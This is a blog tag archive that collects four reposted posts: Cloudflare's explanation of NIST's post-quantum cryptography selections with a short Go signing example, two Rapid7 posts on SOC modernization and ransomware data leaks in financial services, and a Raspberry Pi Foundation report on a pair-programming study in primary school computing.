Tag Archives: research

NIST’s pleasant post-quantum surprise

Post Syndicated from Bas Westerbaan original https://blog.cloudflare.com/nist-post-quantum-surprise/

NIST’s pleasant post-quantum surprise

NIST’s pleasant post-quantum surprise

On Tuesday, the US National Institute of Standards and Technology (NIST) announced which post-quantum cryptography they will standardize. We were already drafting this post with an educated guess on the choice NIST would make. We almost got it right, except for a single choice we didn’t expect—and which changes everything.

At Cloudflare, post-quantum cryptography is a topic close to our heart, as the future of a secure and private Internet is on the line. We have been working towards this day for many years, by implementing post-quantum cryptography, contributing to standards, and testing post-quantum cryptography in practice, and we are excited to share our perspective.

In this long blog post, we explain how we got here, what NIST chose to standardize, what it will mean for the Internet, and what you need to know to get started with your own post-quantum preparations.

How we got here

Shor’s algorithm

Our story starts in 1994, when mathematician Peter Shor discovered a marvelous algorithm that efficiently factors numbers and computes discrete logarithms. With it, you can break nearly all public-key cryptography deployed today, including RSA and elliptic curve cryptography. Luckily, Shor’s algorithm doesn’t run on just any computer: it needs a quantum computer. Back in 1994, quantum computers existed only on paper.

But in the years since, physicists started building actual quantum computers. Initially, these machines were (and still are) too small and too error-prone to be threatening to the integrity of public-key cryptography, but there is a clear and impending danger: it only seems a matter of time now before a quantum computer is built that has the capability to break public-key cryptography. So what can we do?

Encryption, key agreement and signatures

To understand the risk, we need to distinguish between the three cryptographic primitives that are used to protect your connection when browsing on the Internet:

Symmetric encryption. With a symmetric cipher there is one key to encrypt and decrypt a message. They’re the workhorse of cryptography: they’re fast, well understood and luckily, as far as known, secure against quantum attacks. (We’ll touch on this later when we get to security levels.) Examples are AES and ChaCha20.

Symmetric encryption alone is not enough: which key do we use when visiting a website for the first time? We can’t just pick a random key and send it along in the clear, as then anyone surveilling that session would know that key as well. You’d think it’s impossible to communicate securely without ever having met, but there is some clever math to solve this.

Key agreement, also called a key exchange, allows two parties that never met to agree on a shared key. Even if someone is snooping, they are not able to figure out the agreed key. Examples include Diffie–Hellman over elliptic curves, such as X25519.

The key agreement prevents a passive observer from reading the contents of a session, but it doesn’t help defend against an attacker who sits in the middle and does two separate key agreements: one with you and one with the website you want to visit. To solve this, we need the final piece of cryptography:

Digital signatures, such as RSA, allow you to check that you’re actually talking to the right website with a chain of certificates going up to a certificate authority.

Shor’s algorithm breaks all widely deployed key agreement and digital signature schemes, which are both critical to the security of the Internet. However, the urgency and mitigation challenges between them are quite different.

Impact

Most signatures on the Internet have a relatively short lifespan. If we replace them before quantum computers can crack them, we’re golden. We shouldn’t be too complacent here: signatures aren’t that easy to replace as we will see later on.

More urgently, though, an attacker can store traffic today and decrypt later by breaking the key agreement using a quantum computer. Everything that’s sent on the Internet today (personal information, credit card numbers, keys, messages) is at risk.

NIST Competition

Luckily cryptographers took note of Shor’s work early on and started working on post-quantum cryptography: cryptography not broken by quantum algorithms. In 2016, NIST, known for standardizing AES and SHA, opened a public competition to select which post-quantum algorithms they will standardize. Cryptographers from all over the world submitted algorithms and publicly scrutinized each other’s submissions. To focus attention, the list of potential candidates were whittled down over three rounds. From the original 82 submissions, eight made it into the final third round. From those eight, NIST chose one key agreement scheme and three signature schemes. Let’s have a look at the key agreement first.

What NIST announced

Key agreement

For key agreement, NIST picked only Kyber, which is a Key Encapsulation Mechanism (KEM). Let’s compare it side-by-side to an RSA-based KEM and the X25519 Diffie–Hellman key agreement:

NIST’s pleasant post-quantum surprise
Performance characteristics of Kyber and RSA. We compare instances of security level 1, see below. Timings vary considerably by platform and implementation constraints and should be taken as a rough indication only.
NIST’s pleasant post-quantum surprise
Performance characteristics of the X25519 Diffie–Hellman key agreement commonly used in TLS 1.3.
KEM versus Diffie–Hellman

To properly compare these numbers, we have to explain how KEM and Diffie–Hellman key agreements are different.

NIST’s pleasant post-quantum surprise
Protocol flow of KEM and Diffie-Hellman key agreement.

Let’s start with the KEM. A KEM is essentially a Public-Key Encryption (PKE) scheme tailored to encrypt shared secrets. To agree on a key, the initiator, typically the client, generates a fresh keypair and sends the public key over. The receiver, typically the server, generates a shared secret and encrypts (“encapsulates”) it for the initiator’s public key. It returns the ciphertext to the initiator, who finally decrypts (“decapsulates”) the shared secret with its private key.

With Diffie–Hellman, both parties generate a keypair. Because of the magic of Diffie–Hellman, there is a unique shared secret between every combination of a public and private key. Again, the initiator sends its public key. The receiver combines the received public key with its own private key to create the shared secret and returns its public key with which the initiator can also compute the shared secret.

NIST’s pleasant post-quantum surprise
Interactive versus non-interactive key agreement

As an aside, in this simple key agreement (such as in TLS), there is not a big difference between using a KEM or Diffie–Hellman: the number of round-trips is exactly the same. In fact, we’re using Diffie–Hellman essentially as a KEM. This, however, is not the case for all protocols: for instance, the 3XDH handshake of Signal can’t be done with plain KEMs and requires the full flexibility of Diffie–Hellman.

Now that we know how to compare KEMs and Diffie–Hellman, how does Kyber measure up?

Kyber

Kyber is a balanced post-quantum KEM. It is very fast: much faster than X25519, which is already known for its speed. Its main drawback, common to many post-quantum KEMs, is that Kyber has relatively large ciphertext and key sizes: compared to X25519 it adds 1,504 bytes. Is this problematic?

We have some indirect data. Back in 2019 together with Google we tested two post-quantum KEMs, NTRU-HRSS and SIKE in Chrome. SIKE has very small keys, but is computationally very expensive. NTRU-HRSS, on the other hand, has similar performance characteristics to Kyber, but is slightly bigger and slower. This is what we found:

NIST’s pleasant post-quantum surprise
Handshake times for TLS with X25519 (control), NTRU-HRSS (CECPQ2) and SIKE (CECPQ2b). Both post-quantum KEMs were combined with a X25519 key agreement.

In this experiment we used a combination (a hybrid) of the post-quantum KEM and X25519. Thus NTRU-HRSS couldn’t benefit from its speed compared to X25519. Even with this disadvantage, the difference in performance is very small. Thus we expect that switching to a hybrid of Kyber and X25519 will have little performance impact.

So can we switch to post-quantum TLS today? We would love to. However, we have to be a bit careful: some TLS implementations are brittle and crash on the larger KeyShare message that contains the bigger post-quantum keys. We will work hard to find ways to mitigate these issues, as was done to deploy TLS 1.3. Stay tuned!

The other finalists

It’s interesting to have a look at the KEMs that didn’t make the cut. NIST intends to standardize some of these in a fourth round. One reason is to increase the diversity in security assumptions in case there is a breakthrough in attacks on structured lattices on which Kyber is based. Another reason is that some of these schemes have specialized, but very useful applications. Finally, some of these schemes might be standardized outside of NIST.

Structured lattices Backup Specialists
NTRU BIKE 4️⃣ Classic McEliece 4️⃣
NTRU Prime HQC 4️⃣ SIKE 4️⃣
SABER FrodoKEM

The finalists and candidates of the third round of the competition. The ones marked with 4️⃣ are proceeding to a fourth round and might yet be standardized.

The structured lattice generalists

Just like Kyber, the KEMs SABER, NTRU and NTRU Prime are all structured lattice schemes that are very similar in performance to Kyber. There are some finer differences, but any one of these KEMs would’ve been a great pick. And they still are: OpenSSH 9.0 chose to implement NTRU Prime.

The backup generalists

BIKE, HQC and FrodoKEM are also balanced KEMs, but they’re based on three different underlying hard problems. Unfortunately they’re noticeably less efficient, both in key sizes and computation. A breakthrough in the cryptanalysis of structured lattices is possible, though, and in that case it’s nice to have backups. Thus NIST is advancing BIKE and HQC to a fourth round.

While NIST chose not to advance FrodoKEM, which is based on unstructured lattices, Germany’s BSI prefers it.

The specialists

The last group of post-quantum cryptographic algorithms under NIST’s consideration are the specialists. We’re happy that both are advancing to the fourth round as they can be of great value in just the right application.

First up is Classic McEliece: it has rather unbalanced performance characteristics with its large public key (261kB) and small ciphertexts (128 bytes). This makes McEliece unsuitable for the ephemeral key exchange of TLS, where we need to transmit the public key. On the other hand, McEliece is ideal when the public key is distributed out-of-band anyway, as is often the case in applications and mobile apps that pin certificates. To use McEliece in this way, we need to change TLS a bit. Normally the server authenticates itself by sending a signature on the handshake. Instead, the client can encrypt a challenge to the KEM public key of the server. Being able to decrypt it is an implicit authentication. This variation of TLS is known as KEMTLS and also works great with Kyber when the public key isn’t known beforehand.

Finally, there is SIKE, which is based on supersingular isogenies. It has very small key and ciphertext sizes. Unfortunately, it is computationally more expensive than the other contenders.

Digital signatures

As we just saw, the situation for post-quantum key agreement isn’t too bad: Kyber, the chosen scheme is somewhat larger, but it offers computational efficiency in return. The situation for post-quantum signatures is worse: none of the schemes fit the bill on their own for different reasons. We discussed these issues at length for ten of them in a deep-dive last year. Let’s restrict ourselves for the moment to the schemes that were most likely to be standardized and compare them against Ed25519 and RSA-2048, the schemes that are in common use today.

NIST’s pleasant post-quantum surprise

Performance characteristics of NIST’s chosen signature schemes compared to Ed25519 and RSA-2048. We compare instances of security level 1, see below. Timings vary considerably by platform and implementation constraints and should be taken as a rough indication only. SPHINCS+ was timed with simple haraka as the underlying hash function. (*) Falcon requires a suitable double-precision floating-point unit for fast signing.

Floating points: Falcon’s achilles

All of these schemes have much larger signatures than those commonly used today. Looking at just these numbers, Falcon is the best of the worst. It, however, has a weakness that this table doesn’t show: it requires fast constant-time double-precision floating-point arithmetic to have acceptable signing performance.

Let’s break that down. Constant time means that the time the operation takes does not depend on the data processed. If the time to create a signature depends on the private key, then the private key can often be recovered by measuring how long it takes to create a signature. Writing constant-time code is hard, but over the years cryptographers have got it figured out for integer arithmetic.

Falcon, crucially, is the first big cryptographic algorithm to use double-precision floating-point arithmetic. Initially it wasn’t clear at all whether Falcon could be implemented in constant-time, but impressively, Falcon was implemented in constant-time for several different CPUs, which required several clever workarounds for certain CPU instructions.

Despite this achievement, Falcon’s constant-timeness is built on shaky grounds. The next generation of Intel CPUs might add an optimization that breaks Falcon’s constant-timeness. Also, many CPUs today do not even have fast constant-time double-precision operations. And then still, there might be an obscure bug that has been overlooked.

In time it might be figured out how to do constant-time arithmetic on the FPU robustly, but we feel it’s too early to deploy Falcon where the timing of signature minting can be measured. Notwithstanding, Falcon is a great choice for offline signatures such as those in certificates.

Dilithium’s size

This brings us to Dilithium. Compared to Falcon it’s easy to implement safely and has better signing performance to boot. Its signatures and public keys are much larger though, which is problematic. For example, to each browser visiting this very page, we sent six signatures and two public keys. If we’d replace them all with Dilithium2 we would be looking at 17kB of additional data. Last year, we ran an experiment to see the impact of additional data in the TLS handshake:

NIST’s pleasant post-quantum surprise
Impact of larger signatures on TLS handshake time. For the details, see this blog.

There are some caveats to point out: first, we used a big 30-segment initial congestion window (icwnd). With a normal icwnd, the bump at 40KB moves to 10KB. Secondly, the height of this bump is the round-trip time (RTT), which due to our broadly distributed network, is very low for us. Thus, switching to Dilithium alone might well double your TLS handshake times. More disturbingly, we saw that some connections stopped working when we added too much data:

NIST’s pleasant post-quantum surprise
Amount of failed TLS handshakes by size of added signatures. For the details, see this blog.

We expect this was caused by misbehaving middleboxes. Taken together, we concluded that early adoption of post-quantum signatures on the Internet would likely be more successful if those six signatures and two public keys would fit in 9KB. This can be achieved by using Dilithium for the handshake signature and Falcon for the other (offline) signatures.

At most one of Dilithium or Falcon

Unfortunately, NIST stated on several occasions that it would choose only two signature schemes, but not both Falcon and Dilithium:

NIST’s pleasant post-quantum surprise
Slides of NIST’s status update after the conclusion of round 2

The reason given is that both Dilithium and Falcon are based on structured lattices and thus do not add more security diversity. Because of the difficulty of implementing Falcon correctly, we expected NIST to standardize Dilithium and as a backup SPHINCS+. With that guess, we saw a big challenge ahead: to keep the Internet fast we would need some difficult and rigorous changes to the protocols.

The twist

However, to everyone’s surprise, NIST picked both! NIST chose to standardize Dilithium, Falcon and SPHINCS+. This is a very pleasant surprise for the Internet: it means that post-quantum authentication will be much simpler to adopt.

SPHINCS+, the conservative choice

In the excitement of the fight between Dilithium and Falcon, we could almost forget about SPHINCS+, a stateless hash-based signature. Its big advantage is that its security is based on the second-preimage resistance of the underlying hash-function, which is well understood. It is not a stretch to say that SPHINCS+ is the most conservative choice for a signature scheme, post-quantum or otherwise. But even as a co-submitter of SPHINCS+, I have to admit that its performance isn’t that great.

There is a lot of flexibility in the parameter choices for SPHINCS+: there are tradeoffs between signature size, signing time, verification time and the maximum number of signatures that can be minted. Of the current parameter sets, the “s” are optimized for size and “f” for signing speed; both chosen to allow 264  signatures. NIST has hinted at reducing the signature limit, which would improve performance. A custom choice of parameters for a particular application would improve it even more, but would still trail Dilithium.

Having discussed NIST choices, let’s have a look at those that were left out.

The other finalists

There were three other finalists: GeMSS, Picnic and Rainbow. None of these are progressing to a fourth round.

Picnic is a conservative choice similar to SPHINCS+. Its construction is interesting: it is based on the secure multiparty computation of a block cipher. To be efficient, a non-standard block cipher is chosen. This makes Picnic’s assumptions a bit less conservative, which is why NIST preferred SPHINCS+.

GeMSS and Rainbow are specialists: they have large public key sizes (hundreds of kilobytes), but very small signatures (33–66 bytes). They would be great for applications where the public key can be distributed out of band, such as for the Signed Certificate Timestamps included in certificates for Certificate Transparency. Unfortunately, both turned out to be broken.

Signature schemes on the horizon

Although we expect Falcon and Dilithium to be practical for the Internet, there is ample room for improvement. Many new signature schemes have been proposed after the start of the competition, which could help out a lot. NIST recognizes this and is opening a new competition for post-quantum signature schemes.

A few schemes that have caught our eye already are UOV, which has similar performance trade-offs to those for GeMSS and Rainbow; SQISign, which has small signatures, but is computationally expensive; and MAYO, which looks like it might be a great general-purpose signature scheme.

Stateful hash-based signatures

Finally, we’d be remiss not to mention the post-quantum signature scheme that already has been standardized by NIST: the stateful hash-based signature schemes LMS and XMSS. They share the same conservative security as their sibling SPHINCS+, but have much better performance. The rub is that for each keypair there are a finite number of signature slots and each signature slot can only be used once. If it’s used twice, it is insecure. This is why they are called stateful; as the signer must remember the state of all slots that have been used in the past, and any mistake is fatal. Keeping the state perfectly can be very challenging.

What else

What’s next?

NIST will draft standards for the selected schemes and request public feedback on them. There might be changes to the algorithms, but we do not expect anything major. The standards are expected to be finalized in 2024.

In the coming months, many languages, libraries and protocols will already add preliminary support for the current version of Kyber and the other post-quantum algorithms. We’re helping out to make post-quantum available to the Internet as soon as possible: we’re working within the IETF to add Kyber to TLS and will contribute upstream support to popular open-source libraries.

Start experimenting with Kyber today

Now is a good time for you to try out Kyber in your software stacks. We were lucky to correctly guess Kyber would be picked and have experience running it internally. Our tests so far show it performs great. Your requirements might differ, so try it out yourself.

The reference implementation in C is excellent. The Open Quantum Safe project integrates it with various TLS libraries, but beware: the algorithm identifiers and scheme might still change, so be ready to migrate.

Our CIRCL library has a fast independent implementation of Kyber in Go. We implemented Kyber ourselves so that we could help tease out any implementation bugs or subtle underspecification.

Experimenting with post-quantum signatures

Post-quantum signatures are not as urgent, but might require more engineering to get right. First off, which signature scheme to pick?

  • Are large signatures and slow operations acceptable? Go for SPHINCS+.
  • Do you need more performance?
    • Can your signature generation be timed, for instance when generated on-the-fly? Then go for (a hybrid, see below, with) Dilithium.
    • For offline signatures, go for (a hybrid with) Falcon.
  • If you can keep a state perfectly, check out XMSS/LMS.

Open Quantum Safe can be used to test these out. Our CIRCL library also has a fast independent implementation of Dilithium in Go. We’ll add Falcon and SPHINCS+ soon.

Hybrids

A hybrid is a combination of a classical and a post-quantum scheme. For instance, we can combine Kyber512 with X25519 to create a single Kyber512X key agreement. The advantage of a hybrid is that the data remains secure against non-quantum attackers even if Kyber512 turns out broken. It is important to note that it’s not just about the algorithm, but also the implementation: Kyber512 might be perfectly secure, but an implementation might leak via side-channels. The downside is that two key-exchanges are performed, which takes more CPU cycles and bytes on the wire. For the moment, we prefer sticking with hybrids, but we will revisit this soon.

Post-quantum security levels

Each algorithm has different parameters targeting various post-quantum security levels. Up till  now we’ve only discussed the performance characteristics of security level 1 (or 2 in case of Dilithium, which doesn’t have level 1 parameters.) The definition of the security levels is rather interesting: they’re defined as being as hard to crack by a classical or quantum attacker as specific instances of AES and SHA:

Level Definition, as least as hard to break as …
1 To recover the key of AES-128 by exhaustive search
2 To find a collision in SHA256 by exhaustive search
3 To recover the key of AES-192 by exhaustive search
4 To find a collision in SHA384 by exhaustive search
5 To recover the key of AES-256 by exhaustive search

So which security level should we pick? Is level 1 good enough? We’d need to understand how hard it is for a quantum computer to crack AES-128.

Grover’s algorithm

In 1996, two years after Shor’s paper, Lov Grover published his quantum search algorithm. With it, you can find the AES-128 key (given known plain and ciphertext) with only 264 executions of the cipher in superposition. That sounds much faster than the 2127 tries on average for a classical brute-force attempt. In fact, it sounds like security level 1 isn’t that secure at all. Don’t be alarmed: level 1 is much more secure than it sounds, but it requires some context.

To start, a classical brute-force attempt can be parallelized — millions of machines can participate, sharing the work. Grover’s algorithm, on the other hand, doesn’t parallelize well because the quadratic speedup disappears over that portion. To wit, a billion quantum computers would still have to do 249 iterations each to crack AES-128.

Then each iteration requires many gates. It’s estimated that these 249 operations take roughly 264 noiseless quantum gates. If each of our billion quantum computers could execute a billion noiseless quantum gates per second, then it’d still take 500 years.

That already sounds more secure, but we’re not done. Quantum computers do not execute noiseless quantum gates: they’re analogue machines. Every operation has a little bit of noise. Does this mean that quantum computing is hopeless? Not at all! There are clever algorithms to turn, say, a million noisy qubits into one less noisy qubit. It doesn’t just add qubits, but also extra gates. How much depends very much on the exact details of the quantum computer.

It is not inconceivable that in the future there will be quantum computers that effectively execute far more than a billion noiseless gates per second, but it will likely be decades after Shor’s algorithm is practical. This all is a long-winded way of saying that security level 1 seems solid for the foreseeable future.

Hedging against attacks

A different reason to pick a higher security level is to hedge against better attacks on the algorithm. This makes a lot of sense, but it is important to note that this isn’t a foolproof strategy:

  • Not all attacks are small improvements. It’s possible that improvements in cryptanalysis break all security levels at once.
  • Higher security levels do not protect against implementation flaws, such as (new) timing vulnerabilities.

A different aspect, that’s arguably more important than picking a high number, is crypto agility: being able to switch to a new algorithm/implementation in case of a break of trouble. Let’s hope that we will not need it, but now we’re going to switch, it’s nice to make it easier in the future.

CIRCL is Post-Quantum Enabled

We already mentioned CIRCL a few times, it’s our optimized crypto-library for Go whose development we started in 2019. CIRCL already contains support for several post-quantum algorithms such as the KEMs Kyber and SIKE and signature schemes Dilithium and Frodo. The code is up to date and compliant with test vectors from the third round. CIRCL is readily usable in Go programs either as a library or natively as part of Go using this fork.

NIST’s pleasant post-quantum surprise

One goal of CIRCL is to enable experimentation with post-quantum algorithms in TLS. For instance, we ran a measurement study to evaluate the feasibility of the KEMTLS protocol for which we’ve adapted the TLS package of the Go library.

As an example, this code uses CIRCL to sign a message with eddilithium2, a hybrid signature scheme pairing Ed25519 with Dilithium mode 2.

package main

import (
  "crypto"
  "crypto/rand"
  "fmt"

  "github.com/cloudflare/circl/sign/eddilithium2"
)

func main() {
  // Generating random keypair.
  pk, sk, err := eddilithium2.GenerateKey(rand.Reader)

  // Signing a message.
  msg := []byte("Signed with CIRCL using " + eddilithium2.Scheme().Name())
  signature, err := sk.Sign(rand.Reader, msg, crypto.Hash(0))

  // Verifying signature.
  valid := eddilithium2.Verify(pk, msg, signature[:])

  fmt.Printf("Message: %v\n", string(msg))
  fmt.Printf("Signature (%v bytes): %x...\n", len(signature), signature[:4])
  fmt.Printf("Signature Valid: %v\n", valid)
  fmt.Printf("Errors: %v\n", err)
}
Message: Signed with CIRCL using Ed25519-Dilithium2
Signature (2484 bytes): 84d6882a...
Signature Valid: true
Errors: <nil>

As can be seen the application programming interface is the same as the crypto.Signer interface from the standard library. Try it out, and we’re happy to hear your feedback.

Conclusion

This is a big moment for the Internet. From a set of excellent options for post-quantum key agreement, NIST chose Kyber. With it, we can secure the data on the Internet today against quantum adversaries of the future, without compromising on performance.

On the authentication side, NIST pleasantly surprised us by choosing both Falcon and Dilithium against their earlier statements. This was a great choice, as it will make post-quantum authentication more practical than we expected it would be.

Together with the cryptography community, we have our work cut out for us: we aim to make the Internet post-quantum secure as fast as possible.

Want to follow along? Keep an eye on this blog or have a look at research.cloudflare.com.

Want to help out? We’re hiring and open to research visits.

Today’s SOC Strategies Will Soon Be Inadequate

Post Syndicated from Dina Durutlic original https://blog.rapid7.com/2022/07/08/todays-soc-strategies-will-soon-be-inadequate/

Today’s SOC Strategies Will Soon Be Inadequate

New research sponsored by Rapid7 explores the momentum behind security operations center (SOC) modernization and the role extended detection and response (XDR) plays. ESG surveyed over 370 IT and cybersecurity professionals in the US and Canada –  responsible for evaluating, purchasing, and utilizing threat detection and response security products and services – and identified key trends in the space.

The first major finding won’t surprise you: Security operations remain challenging.

Cybersecurity is dynamic

A growing attack surface, the volume and complexity of security alerts, and public cloud proliferation add to the intricacy of security operations today. Attacks increased 31% from 2020 to 2021, according to Accenture’s State of Cybersecurity Resilience 2021 report. The number of attacks per company increased from 206 to 270 year over year. The disruptions will continue, ultimately making many current SOC strategies inadequate if teams don’t evolve from reactive to proactive.

In parallel, many organizations are facing tremendous challenges closer to home due to a lack of skilled resources. At the end of 2021, there was a security workforce gap of 377,000 jobs in the US and 2.7 million globally, according to the (ISC)2 Cybersecurity Workforce Study. Already-lean teams are experiencing increased workloads often resulting in burnout or churn.

Key findings on the state of the SOC

In the new ebook, SOC Modernization and the Role of XDR, you’ll learn more about the increasing difficulty in security operations, as well as the other key findings, which include:

  • Security professionals want more data and better detection rules – Despite the massive amount of security data collected, respondents want more scope and diversity.
  • SecOps process automation investments are proving valuable – Many organizations have realized benefits from security process automation, but challenges persist.
  • XDR momentum continues to build – XDR awareness continues to grow, though most see XDR supplementing or consolidating SOC technologies.
  • MDR is mainstream and expanding – Organizations need help from service providers for security operations; 85% use managed services for a portion or a majority of their security operations.

Download the full report to learn more.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

For Finserv Ransomware Attacks, Obtaining Customer Data Is the Focus

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/07/07/for-finserv-ransomware-attacks-obtaining-customer-data-is-the-focus/

For Finserv Ransomware Attacks, Obtaining Customer Data Is the Focus

Welcome back to the third installment of Rapid7’s Pain Points: Ransomware Data Disclosure Trends blog series, where we’re distilling the key highlights of our ransomware data disclosure research paper one industry at a time. This week, we’ll be focusing on the financial services industry, one of the most most highly regulated — and frequently attacked — industries we looked at.

Rapid7’s threat intelligence platform (TIP) scans the clear, deep, and dark web for data on threats, and operationalizes that data automatically with our Threat Command product. We used that data to conduct unique research into the types of data threat actors disclose about their victims. The data points in this research come from the threat actors themselves, making it a rare glimpse into their actions, motivations, and preferences.

Last week, we discussed how the healthcare and pharmaceutical industries are particularly impacted by double extortion in ransomware. We found that threat actors target and release specific types of data to coerce victims into paying the ransom. In this case, it was internal financial information (71%), which was somewhat surprising, considering financial information is not the focus of these two industries. Less surprising, but certainly not less impactful, were the disclosure of customer or patient information (58%) and the unusually strong emphasis on intellectual property in the pharmaceuticals sector of this vertical (43%).

Customer data is the prime target for finserv ransomware

But when we looked at financial services, something interesting did stand out: Customer data was found in the overwhelming majority of data disclosures (82%), not necessarily the company’s internal financial information. It seems threat actors were more interested in leveraging the public’s implied trust in financial services companies to keep their personal financial information private than they were in exposing the company’s own financial information.

Since much of the damage done by ransomware attacks — or really any cybersecurity incident — lies in the erosion of trust in that institution, it appears threat actors are seeking to hasten that erosion with their initial data disclosures. The financial services industry is one of the most highly regulated industries in the market entirely because it holds the financial health of millions of people in their hands. Breaches at these institutions tend to have outsized impacts.

Employee info is also at risk

The next most commonly disclosed form of data in the financial services industry was personally identifiable information (PII) and HR data. This is personal data of those who work in the financial industry and can include identifying information like Social Security numbers and the like. Some 59% of disclosures from this sector included this kind of information.

This appears to indicate that threat actors want to undermine the company’s ability to keep their own employees’ data safe, and that can be corroborated by another data point: In some 29% of cases, data disclosure pointed to reconnaissance for future IT attacks as the motive. Threat actors want financial services companies and their employees to know that they are and will always be a major target. Other criminals can use information from these disclosures, such as credentials and network maps, to facilitate future attacks.

As with the healthcare and pharmaceutical sectors, our data showed some interesting and unique motivations from threat actors, as well as confirmed some suspicions we already had about why they choose the data they choose to disclose. Next time, we’ll be taking a look at some of the threat actors themselves and the ways they’ve impacted the overall ransomware “market” over the last two years.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

A pair programming approach for engaging girls in the Computing classroom: Study results

Post Syndicated from Katharine Childs original https://www.raspberrypi.org/blog/gender-balance-in-computing-pair-programming-approach-engaging-girls/

Today we share the second report in our series of findings from the Gender Balance in Computing research programme, which we’ve been running as part of the National Centre for Computing Education and with various partners. In this £2.4 million research programme, funded by the Department for Education in England, we aim to identify ways to encourage more female learners to engage with Computing and choose to study it further.

A teacher encourages a learner in the computing classroom.

Previously, we shared the evaluation report about our pilot study of using a storytelling approach with very young computing learners. This new report, again coming from the Behavioural Insights Team (BIT) which acts as the programme’s independent evaluator, describes our study of another teaching approach.

Existing research suggests that computing is not always taught in a way that is engaging for girls in particular [1], and that we can improve this. With the intervention at hand, we wanted to explore the effects of using a pair programming teaching approach with primary school learners aged 8 to 11. We have critically and carefully examined the findings, which show mixed outcomes regarding the effectiveness of the approach, and we believe that the research provides insights that increase our shared understanding of how to teach computing effectively to young learners. 

Computing education through a collaborative lens

Many people think that writing computer programs is a task carried out by people working individually. A 2017 study of 8- and 9-year-olds [2] confirms this: when asked to draw a picture of a computer scientist doing work, 90% of the children drew a picture of one person working alone. This stereotype is present in teaching and learning about computing and computer science; many computer programming lessons take place in a way that promotes solitary working, with individual students sitting in front of separate computers, working on their own code and debugging their own errors.

A girl codes at a laptop while a woman looks on during a Code Club session.

Professional software development rarely happens like this. For example, at the Raspberry Pi Foundation, our software engineers work collaboratively on design and often pair up to solve problems. Computing education research also has identified the importance of looking at computer programming through a collaborative lens. This viewpoint allows us to see computing as a subject with scope for collaborative group work in which students create useful applications together and are part of a community where programming has a shared social context [3]. 

Researching collaborative learning in the primary computing classroom 

One teaching approach in computing that promotes collaborative learning is pair programming (a practice also used in industry). This is a structured way of working on programming tasks  where learners are paired up and take turns acting as the driver or the navigator. The driver controls the keyboard and mouse and types the code. The navigator reads the instructions, supports the driver by watching out for errors in the code, and thinks strategically about next steps and solutions to problems. Learners swap roles every 5 to 10 minutes, to ensure that both partners can contribute equally and actively to the collaborative learning.

Two female learners code at a computer together.

As one part of the Gender Balance in Computing programme, we designed a project to explore the effect of pair programming on girls’ attitudes towards computing. This project builds on research from the USA which suggests that solving problems collaboratively increases girls’ persistence when they encounter difficulties in programming tasks [4].

In the Pair Programming project, we worked with teachers of Year 4 (ages 8–9) and Year 6 (ages 10–11) in schools in England. From January to March 2020, we ran a pilot study with 10 schools and used the resulting teacher feedback to finalise the training and teaching materials for a full randomised controlled trial. Due to the coronavirus pandemic, we trained teachers in the pair programming approach using an online course instead of face-to-face training.

A tweet from a school about taking part in the pair programming intervention of the Gender Balance in Computing research programme.
A tweet from a school about taking part in the pair programming study.

The randomised controlled trial ran from September to December 2021 with 97 schools. Schools were randomly allocated to either the intervention group and used the pair programming training and the scheme of work we designed, or to the control group and taught Computing in their usual way, not aware that we were investigating the effects of pair programming. Due to the coronavirus pandemic, our training of teachers in the pair programming approach had to take place via an online course instead of face to face.

Teachers in both groups delivered 12 weeks of Computing lessons, in which learners used Scratch programming to draw shapes and create animations. The lessons covered computing concepts from Key Stage 2 (ages 7–11), such as using sequences, selection, and repetition in programs, as well as digital literacy skills such as using technology respectfully.

What can we learn about pair programming from the study? 

The findings about this particular intervention were limited by the amount of data the independent evaluators at BIT were able to collect amongst learners and teachers given the ongoing pandemic. BIT’s evaluation was primarily based on quantitative data collected from learners at the start and the end of the intervention. To collect the data, they used a validated instrument called the Student Computer Science Attitude Survey (SCSAS), which asks learners about their attitudes towards Computing. The evaluators compared the datasets gathered from the intervention group (who took part in pair programming lessons) and the control group (who took part in Computing lessons taught with a ‘business as usual’ model).

A teacher watches two female learners code in Code Club session in the classroom.

The evaluators’ data analysis found no statistically significant evidence that the pair programming approach positively affected girls’ attitudes towards computing or their intention to study computing in the future. The lack of statistically significant results, called a null result in research projects, can appear disappointing at first. But our work involves careful reflection and critical thinking about all outcomes of our research, and the result of this project is no exception. These are factors that may have contributed towards the result: 

  • The independent evaluators suggested that the intervention may lead to different findings if it were implemented again without the disruptions caused by the pandemic. One of their recommendations was to revert to our original planned model of providing face-to-face training to teachers delivering the pair programming approach, and we believe this would embed a deeper understanding of the approach. 
  • Our research built upon a prior study [4] that suggested a connection between pair programming and increased confidence about problem-solving in girls of a similar age. That study took place in a non-formal setting in an all-girls group, whereas our research was situated in formal education in mixed gender groups. It may be that these differences are significant. 
  • It may be that there is no causal link between using the pair programming approach and an increase in girls’ attitudes towards computing, or that the link may only become apparent over a longer time-scale, or that the pair programming approach needs to be combined with other strategies to achieve a positive effect. 

The evaluators also gathered qualitative data by running teacher and learner interviews, and we were pleased that this data provided some rich insights into the benefits of using a pair programming approach in the primary classroom, and gave some promising indications of possible benefits for female learners in particular. 

  1. Teachers spoke positively about the use of paired activities, and felt that having the defined roles of driver and navigator helped both partners to contribute equally to the programming tasks. Learners said that they enjoyed working in pairs, even though there could be some moments of frustration. Some of the teachers were even planning to integrate pair programming into future lessons. This suggests that the approach was effective both in engaging and motivating learners, as well as in facilitating the planned learning outcomes of the lessons,  and that it can be used more widely in primary computing teaching.

“I don’t know why I’ve never thought to do computing like that, actually, because it’s a really good vehicle for the fact that there are two roles, clearly defined. There’s all your conversation, and knowledge comes through that, and then they’re both equally having a turn.” — Primary school teacher (report, p. 38)

“I like working with both [both as a partner and by yourself] because when you do pair programming, you’re collaborating with your partner, making links, and you have to tell them what to do. But if you have a really good idea and then they put the wrong thing in the wrong place, it’s quite annoying.” — Female learner (report, p. 40)

  1. Both teachers and learners felt that having the support of a partner boosted learners’ confidence, which echoes previous research in the field [5, 6]. In computing, boys more accurately assess their capabilities, whereas girls tend to underestimate their performance [7]. When learners feel a positive emotion such as confidence towards a subject, combined with a belief that they can succeed in tasks related to that subject, this shows self-efficacy [8]. Our findings suggest that, through the use of the pair programming approach, both boys and girls improved their sense of self-efficacy towards Computing, which is corroborated by quotes from learners themselves. This is interesting because a sense of self-efficacy in Computing is linked to the decisions to pursue further study in the subject [9]. More research could build on this observation. 

